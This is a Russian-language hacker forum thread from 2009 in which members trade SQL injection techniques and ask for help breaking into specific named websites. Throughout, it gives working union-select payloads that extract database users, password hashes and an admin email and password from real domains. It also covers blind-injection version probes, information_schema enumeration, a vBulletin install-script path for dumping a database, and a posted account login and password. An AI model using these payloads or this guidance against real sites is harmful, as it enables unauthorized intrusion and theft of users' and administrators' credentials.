RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 15:03:08.460000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Ну, я бы еще добавил следующее:
Если запросы:
index.php?id=20
index.php?id=20-1
вернули одинаковые страницы, а запрос
index.php?id=19
другую страницу, то здесь ловить нечего. Скорее всего, параметр id грубо приводится к целому числу.
quote:
select * from main where id='213''
Так будет, только при отключении экранирования кавычек (что редко).
А вообще id редко заключают в скобки:
select * from main where id=213'
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 16:09:47.246666
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
узнал название одной таблицы
как узнать другие ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 16:25:05.896666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
horiz,
1. Это не статья
2. Я специально не стал расписывать способ "20-1" или "and+1=1", но при этом написал "Есть и другие способы определения sql инъекции, читай мануалы и побольше…", это было для того, чтобы автор вопроса, сам захотел узнать как ещё можно определить инъект, в следствии чего, мануалы ему пришлось бы читать более внимательно. К тому же, вопрос был только про кавычку.
quote:
А вообще id редко заключают в скобки:
Бред..
alex7474,
Если 5-ая ветка, то через information_schema, если <5, то только перебором.
ЗЫ: Если это не MYSQL, то уточни..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 16:38:53.900000
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
это мускул) 4.** =( + участвует префикс
проблема решена..
у админа были открыты пути … там лежали SQL файлы…
уже в админке :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 17:01:07.736666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Запускай сипт и вперёд…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 20:07:56.720000
|
|
|
BrainKillah
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-13 14:35:33.830000
|
Комрады подскажите!!!
Нужно похекать сайт на vBulletin 3.5.4
На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
Таким образом можно сделать дамп базы данных.
Как должен будет выглядеть запрос?
Мне для начала нужно заняться подборкой полей?
Просто Инъекциями я начал заниматься недавно, в голове полная каша…
помогите разобраться…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 20:16:28.610000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
1. Это не Sql inj
2. Я же тебе сказал: /install/upgrade_301.php?step=backup
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 20:19:21.703333
|
|
|
BrainKillah
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-13 14:35:33.830000
|
соррь! за вездесущий флуд… )
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 20:22:04.370000
|
|
|
BrainKillah
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-13 14:35:33.830000
|
vBulletin 3.0.1 Upgrade System
просто ещё там вот эта ****я требует Customer Number…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 20:24:04.903333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Попробуй /install/upgrade_300.php?step=1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 21:43:05.700000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://inferno.su/district.php?login=geroinn&pass=Agtwdg24&dist_id=5-1&dist_id_cur=1
——–
тест акк geroinn Agtwdg24
——–
блинд sql или mssql я не могу нечего понять, помогите
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 22:17:30.280000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
[ Внимание! Проверка безопасности! ]
Ваш Soft и IP не совпадают с последними зафиксированными
Для продолжения необходимо ввести секретное число
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-27 22:17:31.123333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Что тут сказать..
1. Это MYSQL
2. 5-ая ветка..
3. Собственно и все… Раскрутить не удалось.
Select не проходит что-ли…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 10:04:23.663333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
r1dex
quote:
quote:
А вообще id редко заключают в скобки:
Бред..
С какого перепоя?!?!
Лично я в сети в подавляющем большинстве встречал только два случая:
1) id без скобок и фильтраций //когда кодер дибил
2) id приводится к целому //когда кодер не полный дибил. Там уже хз в скобках он его подставил или нет
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 14:02:32.516666
|
|
|
deemon2008
Сообщений: 14
Оценки: 0
Присоединился: 2008-12-21 01:27:51.586666
|
Возникла проблема:путем такого(http://www.parfumshop.ru/index.php?cnt=218&ctype=-1+union+select+1,2,3,4,user,6,7,password,9,10,11+from+mysql.user–) запроса получил юзеров и хеш такого вида(10cc22262ae2550f).На https://hashcracking.info/ его расшифровал,а войти под таким логином и паролем не получается.В чем может быть проблема?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 14:36:21.896666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Пытаешь залогиниться на сайте, с логинами и паролями от мускулы?
Вот юзеры:
quote:
http://www.parfumshop.ru/index.php?cnt=218&ctype=-1+union+select+concat(user_login,0x3a,user_password),2,3+from+users+limit+1,1–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 17:03:28.406666
|
|
|
deemon2008
Сообщений: 14
Оценки: 0
Присоединился: 2008-12-21 01:27:51.586666
|
Ок.А каким образом можно выдернуть login и pass именно админа,а не юзеров?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 17:05:44.833333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://inferno.su/district.php?login=geroinn&pass=Agtwdg24&dist_id=5-1&dist_id_cur=1
——–
тест акк geroinn Agtwdg24
——–
блинд sql или mssql я не могу нечего понять, помогите
секеретное число 111
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 19:21:52.863333
|
|
|
gemw
Сообщений: 18
Оценки: 0
Присоединился: 2009-01-10 22:01:27.850000
|
deemon2008 как правило админ расположен вначале списка таблицы в данном случае users.с помощью limit передвигайся по юзерам.потом ищи админку сайта и пытайся зайти.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 19:53:41.386666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
2 Isusik:
где ты там вообще увидел скулю? У меня идет просто перенаправление на главную, ошибок не выдает
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 21:06:12.903333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Скуля есть явно http://inferno.su/district.php?login=geroinn&pass=Agtwdg24&dist_id=5+and+substring(@@version,1,1)=5&dist_id_cur=1 пятая версия мускуля..токо как написал r1dex с селектом явно чёто не клеиться…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 21:06:33.106666
|
|
|
gemw
Сообщений: 18
Оценки: 0
Присоединился: 2009-01-10 22:01:27.850000
|
вообще то кавычка фильтруется:
http://inferno.su/news.php?p_id=0%27 ни blind иньекции ни какой другой я не увидел
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 21:11:38.766666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
http://inferno.su/district.php?login=geroinn&pass=Agtwdg24&dist_id=5+and+substring(@@version,1,1)=5&dist_id_cur=1
http://inferno.su/district.php?login=geroinn&pass=Agtwdg24&dist_id=5+and+substring(@@version,1,1)=4&dist_id_cur=1
сравни результаты перенаправлений
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-28 23:51:56.983333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://dom-2.ru/index.php?PHPSESSID=2-1 ребята может поможете с этим хавном
я понимаб может не та тема но пихните мя в правельное русло…. за ранее спс….
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 00:10:02.900000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Нету там ничего.
Вообще интересно, что ты пытаешься с сессией сделать ^_^
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 00:10:48.216666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
или хотябы скажите что тут можно придумать
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 12:22:12.220000
|
|
|
gemw
Сообщений: 18
Оценки: 0
Присоединился: 2009-01-10 22:01:27.850000
|
попробуй зарегаться.возможностей становится шире…но не факт:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 16:10:51.936666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://love.wapos.ru/contacts.php?f=2-1
geroin22 123123
похожа на блинд
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 16:15:44.460000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Нету там ничего..
http://love.wapos.ru/contacts.php?f=3-1
http://love.wapos.ru/contacts.php?f=2+and+1=1
http://love.wapos.ru/contacts.php?f=2+and+1=0
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 16:47:44.163333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://love.wapos.ru/top.php?sex=2-1
а тут
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 17:02:32.253333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Тоже самое..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 22:34:35.786666
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
Парни помогиту у меня есть таблица USER как мне ёё открыть
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-29 23:49:50.820000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Всмысле как? from+USER
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-30 02:16:58.150000
|
|
|
deemon2008
Сообщений: 14
Оценки: 0
Присоединился: 2008-12-21 01:27:51.586666
|
У меня вопрос:нашел инъекцию,выдает ошибку :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND a_active=1 AND (city_code='msk' OR city_code='all') ORDER BY a_' at line 3.
Когда начинаю подбирать кол-во полей -1+union+select+1/* выдает :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND a_active=1 AND (city_code='msk' OR city_code='all') ORDER BY a_' at line 6,
-1+union+select+1– выдает Unknown column 'a_active' in 'field list'
хотя должен,насколько я понимаю выдавать вот это :
The used SELECT statements have a different number of columns.
Не подскажете в чем может быть проблема?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-30 02:55:16.480000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ссылку скинь…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-30 15:34:41.213333
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
8|
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-30 17:07:56.713333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
tohack,
Так в чем проблема? Узнаем колонки:
-1+union+select+1,column_name+from+information_schema.columns+where+table_name=0x75736572–
Составляем запрос:
-1+union+select+1,concat(username,0x3a,password)+from+user–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-30 18:18:09.790000
|
|
|
tohack
Сообщений: 50
Оценки: 0
Присоединился: 2008-12-24 23:12:33.300000
|
r1dex,всё спасибо я разобрался забыл просто
http://www.gempar.com/produk.php?cat=-6
Вот посмотри что скажешь я тут таблы нашёл,имя и пароль одного юзера нашёл а как мне а админку зайти и возможно ли это помогите…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-30 22:32:47.876666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
ребята у меня тут маленкий трабл - посмотрите что с этой ссылкой…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-01-31 06:14:38.203333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: tohack
r1dex,всё спасибо я разобрался забыл просто
http://www.gempar.com/produk.php?cat=-6
Вот посмотри что скажешь я тут таблы нашёл,имя и пароль одного юзера нашёл а как мне а админку зайти и возможно ли это помогите…
Админка здесь:
http://www.gempar.com/admin~/
Мыло и пароль админа:
http://www.gempar.com/produk.php?cat=-6+union+select+concat(email,0x3a,passadmin),2+from+setting/*
но не пускает
|
|
|
|
|
|
